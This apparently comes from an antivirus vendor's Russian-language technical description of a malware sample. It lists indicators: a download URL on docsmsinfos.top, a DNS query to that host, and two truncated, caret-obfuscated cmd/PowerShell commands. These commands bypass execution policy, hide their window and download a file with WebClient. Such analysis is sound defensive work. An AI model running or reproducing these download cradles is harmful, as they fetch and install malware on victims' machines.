Техническая информация
- http://docsmsinfos.top/officesmgmt.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^WeRSHe^ll.^exE -^ExEcu^Ti^O^n^pOL^I^CY^ ^b^Yp^ASS -^nOPROFIle -^WInd^o^wSty^lE HiDD^En (NEW-O^BJEcT^ ^sy^STe^m.nEt^.w^e^bclIe^N^T^).dow^NLoa^Df^ile('http://docsmsinfos.top/offi...
- DNS ASK do###sinfos.top
- '<SYSTEM32>\cmd.exe' /C "p^o^WeRSHe^ll.^exE -^ExEcu^Ti^O^n^pOL^I^CY^ ^b^Yp^ASS -^nOPROFIle -^WInd^o^wSty^lE HiDD^En (NEW-O^BJEcT^ ^sy^STe^m.nEt^.w^e^bclIe^N^T^).dow^NLoa^Df^ile('http://docsmsinfos.top/offi...' (со скрытым окном)